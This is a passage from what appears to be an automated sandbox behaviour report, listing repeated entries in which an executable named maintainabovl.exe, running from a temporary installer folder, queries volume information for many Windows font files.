                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
